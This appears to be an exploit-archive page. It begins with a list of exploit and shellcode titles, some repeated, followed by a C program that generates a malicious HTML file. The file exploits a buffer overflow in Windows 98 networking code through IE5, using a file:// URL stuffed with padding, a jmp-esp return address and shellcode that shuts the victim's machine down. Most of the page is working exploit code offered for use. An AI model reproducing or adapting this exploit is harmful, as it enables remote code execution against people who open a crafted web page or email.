
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
60 lines
No EOL
2.4 KiB
C
60 lines
No EOL
2.4 KiB
C
// source: https://www.securityfocus.com/bid/779/info
|
|
|
|
There is a overflowable buffer in the networking code for Windows 95 and 98 (all versions). The buffer is in the part of the code that handles filenames. By specifying an exceptionally long filename, an attacker can cause the machine to crash or execute arbitrary code. This vulnerability could be exploited remotely by including a hostile UNC or file:// URL in a web page or HTML email. The attack would occur when the page was loaded in a browser or the email was opened (including opening the email in a preview pane.)
|
|
|
|
/*=========================================================================
|
|
Microsoft IE5 for Windows98 exploit
|
|
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
|
|
Written by UNYUN (shadowpenguin@backsection.net)
|
|
=========================================================================
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <windows.h>
|
|
|
|
#define MAXBUF 1000
|
|
#define RETADR 53
|
|
|
|
/*
|
|
jmp esp (FF E4) code is stored in this area.
|
|
You must change this address for non-Japanese Windows98
|
|
*/
|
|
#define EIP 0xbfb75a35
|
|
|
|
unsigned char exploit_code[200]={
|
|
0x43,0x43,0x43,0x43,0x43,0x53,0x53,0x53,
|
|
0xB8,0x2D,0x23,0xF5,0xBF,0x48,0x50,0xC3,
|
|
0x00
|
|
};
|
|
|
|
main(int argc,char *argv[])
|
|
{
|
|
FILE *fp;
|
|
unsigned int ip;
|
|
unsigned char buf[MAXBUF];
|
|
|
|
if (argc<2){
|
|
printf("usage %s output_htmlfile\n",argv[0]);
|
|
exit(1);
|
|
}
|
|
if ((fp=fopen(argv[1],"wb"))==NULL) return FALSE;
|
|
fprintf(fp,"<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0;URL=file://test/");
|
|
|
|
memset(buf,0x41,MAXBUF);
|
|
ip=EIP;
|
|
buf[RETADR-1]=0x7f;
|
|
buf[RETADR ]=ip&0xff;
|
|
buf[RETADR+1]=(ip>>8)&0xff;
|
|
buf[RETADR+2]=(ip>>16)&0xff;
|
|
buf[RETADR+3]=( ip>>24)&0xff;
|
|
memcpy(buf+80,exploit_code,strlen(exploit_code));
|
|
buf[MAXBUF]=0;
|
|
fprintf(fp,"%s/\">\n<HTML><B>",buf);
|
|
fprintf(fp,"10 seconds later, this machine will be shut down.</B><BR><BR>");
|
|
fprintf(fp,"If you are using IE5 for Japanese Windows98, ");
|
|
fprintf(fp,"maybe, the exploit code which shuts down your machine will be executed.<BR>");
|
|
fprintf(fp,"</HTML>\n");
|
|
fclose(fp);
|
|
printf("%s created.\n",argv[1]);
|
|
return FALSE;
|
|
} |